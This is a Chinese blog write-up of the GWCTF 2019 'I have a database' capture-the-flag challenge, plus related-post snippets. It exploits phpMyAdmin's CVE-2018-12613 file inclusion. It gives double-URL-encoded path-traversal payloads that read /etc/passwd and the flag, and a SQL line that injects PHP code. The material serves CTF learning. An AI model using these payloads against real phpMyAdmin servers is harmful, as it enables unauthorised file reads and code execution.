[GWCTF 2019]我有一个数据库

最新推荐文章于 2025-06-11 20:01:01 发布

baozongwi

最新推荐文章于 2025-06-11 20:01:01 发布

阅读量329

点赞数 7

分类专栏： BUUctf web 文章标签：数据库 web安全经验分享

本文链接：https://blog.youkuaiyun.com/2301_81040377/article/details/140405469

版权

BUUctf web 专栏收录该内容

17 篇文章

订阅专栏

我起初以为是sql注入
在这里插入图片描述
抓包什么都没有
扫描一下吧
全是文件包，找找有没有有用的

没啥用，但是我们还扫到了一个东西
访问phpmuyadmin/index.php发现什么用
然后我把index.php搞掉了发现version

CVE-2018-12613

那么我们看看哦

?target=db_sql.php%253f/../ 
可以执行代码
?target=sql.php?/../../../../../../../../../etc/passwd

在这里插入图片描述
成功
sql执行命令
SELECT “<?php phpinfo();?>”

在这里插入图片描述

％25的url编码为％
％3f的url编码为？
％253f->？

%253f开始服务器自动解码一次为%3f，然后urldecode函数再解码一次为?
满足漏洞白名单

?target=db_sql.php%253f/../../../../../../../../../../../../../../../flag

我们返回上级目录到根目录就可以得到flag
一直加，反正根目录没有上级目录了
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

baozongwi

关注关注

7
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BUUCTF[GWCTF 2019]我有一个数据库

LSYZWF的博客

10-12

1885

文章目录题目解答漏洞分析知识点题目链接：https://buuoj.cn/challenges#[GWCTF%202019]%E6%88%91%E6%9C%89%E4%B8%80%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93 解答 1、乱码，看不懂 2、F12 同时结合题目可能与数据库有关 3、可以尝试扫描相关数据库的端口是否开放，也可以通过数据库工具进行连接测试，但是这里使用的是phpmyadmin 随便翻阅了一下，得不到有用的东西，也证实了上面什么都没有的说法 4、从

[GWCTF 2019]我有一个数据库&&getshell

plant1234的博客

03-24

2988

BUU我有一个数据库&&getsholl 做这题的话目的是为了复现 phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞这题的话打开看是乱码,但查看响应还是有东西的：多的不说先信息收集一波，直接扫目录，看页面有没有有用的信息然后。日常访问有没有：robots.txt 得到：在发现有phpinfo.php 访问得到：得到了后端脚本语言php的一些信息扫描得到：扫描发现有：phpmyadmin/ 直接访问得到：发现没有要登陆省去了很多的步骤尝试用

参与评论您还未登录，请先登录后发表或查看评论

[GWCTF 2019]我有一个数据库1

kw741951的博客

08-03

402

打开题目，一串乱码，不认识的汉字。

[GWCTF 2019]我有一个数据库 wp

m0_55185160的博客

04-23

4637

得到了/phpmyadmin/路径，加上题目是我有一个数据库，于是想到应该本题就是和phpmyadmin数据库有关我们可以看到phpmyadmin的版本为4.8.1，搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613，下面我们复现一下漏洞。首先分析一下源码： index.php 关于target的部分 $target_blacklist = array ( 'imp..

[GWCTF 2019]我有一个数据库1 [CVE phpMyAdmin漏洞]

2401_86190146的博客

03-30

565

target=db_datadict.php%253f ”，由于服务器会自动解码一次，所以在checkPageValidity()中，page的值一开始会是“db_datadict.php%3f”，又一次url解码后变成了“db_datadict.php?漏洞点在于，如果我们传入二次编码的内容，经过服务器url解码， checkPageValidity()url解码以后变成了符合白名单内容的名字，就能执行include文件，但是实际上这个$page的内容却不是白名单里的文件名。访问/phpmyadmin。

[GWCTF 2019]我有一个数据库（特详解）

热门推荐

qq_74806534的博客

01-31

1万+

记下来就是利用文章里的payload了，这里../回到上一级目录，只要多于5个，能回到根目录就行，etc/passwd是linux存放用户和密码的文件，在根目录。页面一开始乱码，先教大家应该修复的方法，到火狐打开，然后找到小工具里的修复文字编码，就可以了（没有的话可以在定制工具栏里添加）在界面可以查到各服务器的版本，可以去百度各版本服务器的漏洞。他说什么都没有，先dirsearch扫一下。直接看上面那个师傅的文章，十分详细的。查看其他的吧，有个数据库看看去。这里就不一样查了，直接上结论。

[GWCTF 2019]我有一个数据库 1

qq_43618536的博客

07-21

864

[GWCTF 2019]我有一个数据库 1

BUUCTF WEB [GWCTF 2019]我有一个数据库

Y1da的博客

04-27

515

BUUCTF WEB [GWCTF 2019]我有一个数据库 刷新后查看响应包 <!DOCTYPE html> <html> <head> <title>空的数据库</title> </head> <body> <h1>我有一个数据库，但里面什么也没有~</h1> <h1>不信你找</h1> </body> </html> 没有什么其他

web buuctf [GWCTF 2019]我有一个数据库1

weixin_44214568的博客

03-26

3695

1.直接放弃御剑了，在buu上扫不到，我自己登录先看了一下有没有robots.txt，有，但是没有扫到，我用了disearch，设置了s之后可以扫到了 py dirsearch -u url -e * -s 1 扫描出来

BUU刷题--[GWCTF 2019]我有一个数据库

weixin_48631429的博客

12-02

644

我有一个数据库 打开看到这样一堆文字，读不懂，也没有其他的信息。怎么想也想不到该怎么做，buu还不能扫描。所以只能看了wp，看到有一个/phpmyadmin，回来开始想怎么做 phpmyadmin版本信息4.8.1，搜索一下有什么漏洞。任意文件包含：那么我们就可以利用来读flag ?target=db_datadict.php%253f/../../../../../../../../../flag 拿到flag 考点就是CVE-2018-12613 ...

[GWCTF 2019]我有一个数据库(文件包含漏洞)

weixin_44110537的博客

10-03

472

一堆乱码,什么都没有. 查看源代码也没有什么隐藏信息. 于是dirsearch扫描一下,发现有个数据库登入页面. 发现不用登录直接就可以进去了. 但是发现这里面什么都没有. cve-2018-12613-PhpMyadmin后台文件包含这个漏洞出现在index.php中的 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_st.

Centos7下的MySQL部署

2401_83224865的博客

06-09

823

尤其是在部署 MySQL 8.0 时，用户往往会遇到镜像源失效、GPG 签名验证失败等棘手问题。本文将结合实际操作场景，详细阐述如何在 CentOS 7 上成功部署 MySQL 8.0，并深入解析镜像源替换、DNS 配置、GPG 验证等核心难点的解决方案。GPG（GNU Privacy Guard）用于验证软件包的完整性和来源合法性，防止恶意篡改。忽略 GPG 验证会绕过软件包签名检查，可能导致安装被篡改的恶意软件，：此操作会禁用所有软件包的 GPG 验证，存在严重安全隐患。是否移除匿名用户（建议移除）

全面解析数据库：从基础概念到前沿应用

BEST_yundun的博客

06-09

1122

一文了解数据库概念

Dify-6: 部署

uncle_ll的博客

06-10

1277

本文详细介绍了Dify系统的部署方案，主要包含架构说明、系统要求、部署方法和配置指南

PostgreSQL --数据库操作